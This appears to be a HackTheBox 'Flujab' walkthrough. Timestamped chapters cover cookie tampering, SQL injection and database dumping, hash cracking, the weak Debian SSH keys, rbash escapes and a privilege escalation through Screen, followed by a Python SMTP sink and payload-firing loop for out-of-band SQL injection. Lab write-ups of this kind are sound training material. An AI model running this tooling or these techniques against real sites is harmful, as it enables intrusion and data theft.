HackTheBox - Flujab
01:30 - Start of Recon
04:15 - Adding DNS Names to /etc/hosts
05:20 - Using Aquatone to take HTTP Screenshots of a bunch of pages
11:00 - Start of looking at FreeFlujab.htb
15:40 - Looking at HTTP Cookies we send
17:40 - Editing Cookies in Firefox
19:50 - Discovering SMTP_CONFIG, which lets us change which mail server the site sends to
21:50 - Using Firefox dev tools to remove the client-side character restrictions on a page
24:15 - The web page kept resetting our cookie; using Burp's Match and Replace to keep our value
27:30 - Standing up an SMTP server in Python to read the mail the site sends us
30:20 - Discovering SQL Injection
34:50 - SQL Injection confirmed, testing Union Injections
37:40 - Creating a Python Script to aid us in running SQL Injections
37:40 - Script: Running an SMTP server in a background thread
41:35 - Script: Adding arrow-key history so we can recall previous commands
46:42 - Script: Making our command prompt send HTTP Requests
52:40 - Dumping database structure from INFORMATION_SCHEMA
1:05:00 - Dumping information out of the VACCINATIONS Table
1:07:50 - User information dumped, cracking a SHA-256 hash
1:11:00 - Accessing a new hostname found in the database (sysadmin-console-01)
1:16:00 - Logging into Ajenti
1:17:00 - Discovering Ajenti's Notepad can read arbitrary files from the server
1:24:10 - A README file suggests there was an SSH key compromise on the box
1:27:40 - Searching the known weak Debian SSH keys for the one used on the box
1:29:48 - Able to SSH into the box with the key! However, we land in a restricted bash (rbash)
1:30:30 - rbash escape 1: Using GTFOBins to find a way out of restricted bash
1:32:30 - rbash escape 2: Passing `-t bash` to SSH so the login runs an unrestricted shell
1:33:30 - Exploiting an old version of Screen to PrivEsc!
* Second way to get a shell on the box *
1:43:40 - Creating files in /home/sysadm
1:46:40 - SSH is configured to allow public keys to also be placed in ~/access
1:48:00 - Reading the Ajenti documentation to see that its API lets us change file permissions
1:50:00 - Ajenti wants the chmod mode number in an unusual format
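The 37:40 to 46:42 segments build a helper script: an SMTP sink in a background thread, a prompt with arrow-key history, and a loop that fires each payload at the web app and prints the mail that comes back. The script below is an added example written for this page, not ippsec's own script from the video. It implements a minimal SMTP receiver on top of the standard library (the old `smtpd` module was removed in Python 3.12), and the target URL, form field and cookie names in `fire_payload` are placeholders you would replace with the ones from your own recon.

```python
"""Added example: SMTP sink + readline prompt for out-of-band SQLi (not the video's script)."""
import queue
import smtplib
import socketserver
import threading
import urllib.parse
import urllib.request

try:
    import readline  # merely importing it gives input() history and line editing
except ImportError:  # not available on every platform; the prompt still works
    readline = None


class _SMTPHandler(socketserver.StreamRequestHandler):
    """Speaks just enough SMTP to accept one or more messages and queue them."""

    def _reply(self, line):
        self.wfile.write((line + "\r\n").encode())

    def handle(self):
        sender, rcpts = None, []
        self._reply("220 sink ESMTP ready")
        while True:
            raw = self.rfile.readline()
            if not raw:  # peer hung up without QUIT
                return
            line = raw.decode(errors="replace").rstrip("\r\n")
            verb = line.split(" ", 1)[0].upper()
            if verb in ("HELO", "EHLO"):
                self._reply("250 sink")  # no extensions advertised
            elif verb == "MAIL":
                sender = line.split(":", 1)[1].strip().strip("<>")
                self._reply("250 OK")
            elif verb == "RCPT":
                rcpts.append(line.split(":", 1)[1].strip().strip("<>"))
                self._reply("250 OK")
            elif verb == "DATA":
                self._reply("354 End data with <CR><LF>.<CR><LF>")
                body = []
                while True:
                    raw = self.rfile.readline()
                    if not raw:
                        return
                    text = raw.decode(errors="replace").rstrip("\r\n")
                    if text == ".":
                        break
                    body.append(text[1:] if text.startswith("..") else text)  # dot-unstuffing
                # queue before replying so the sender's 250 implies the message is stored
                self.server.messages.put({"from": sender, "to": list(rcpts), "data": "\n".join(body)})
                sender, rcpts = None, []
                self._reply("250 OK queued")
            elif verb in ("RSET", "NOOP"):
                sender, rcpts = None, []
                self._reply("250 OK")
            elif verb == "QUIT":
                self._reply("221 bye")
                return
            else:
                self._reply("502 command not implemented")


class MailSink(socketserver.ThreadingTCPServer):
    """SMTP sink that runs in a daemon thread; port=0 lets the kernel pick a free port."""
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, host="127.0.0.1", port=0):
        super().__init__((host, port), _SMTPHandler)
        self.messages = queue.Queue()
        self._thread = threading.Thread(target=self.serve_forever, daemon=True)

    def start(self):
        self._thread.start()
        return self.server_address[1]

    def wait_for_mail(self, timeout=10):
        try:
            return self.messages.get(timeout=timeout)
        except queue.Empty:
            return None


def send_local_mail(port, sender, rcpt, message):
    """Constructed test traffic: deliver one message to the sink with smtplib."""
    with smtplib.SMTP("127.0.0.1", port, timeout=5) as smtp:
        smtp.sendmail(sender, [rcpt], message)


def fire_payload(payload, url="http://freeflujab.htb/", field="nhs-num", cookies=None):
    """POST one form with `field` set to the payload. URL/field/cookies are placeholders."""
    body = urllib.parse.urlencode({field: payload}).encode()
    headers = {"Cookie": "; ".join(f"{k}={v}" for k, v in (cookies or {}).items())}
    with urllib.request.urlopen(urllib.request.Request(url, data=body, headers=headers), timeout=10) as r:
        return r.status


def prompt_loop(sink, fire=fire_payload):
    """Read a payload (with history), fire it, then print the mail the target sends back."""
    while True:
        try:
            payload = input("sqli> ")
        except (EOFError, KeyboardInterrupt):
            return
        if not payload.strip():
            continue
        fire(payload)
        mail = sink.wait_for_mail()
        print(mail["data"] if mail else "(no mail received; check SMTP_CONFIG points at us)")


if __name__ == "__main__":
    sink = MailSink(port=2525)  # make SMTP_CONFIG on the target point here
    print("listening on port", sink.start())
    prompt_loop(sink)
```

The handler queues the message before it replies `250`, so once `sendmail()` (or the target's mailer) returns, the mail is already available to `wait_for_mail()`; that ordering is what keeps the prompt loop from racing the sink.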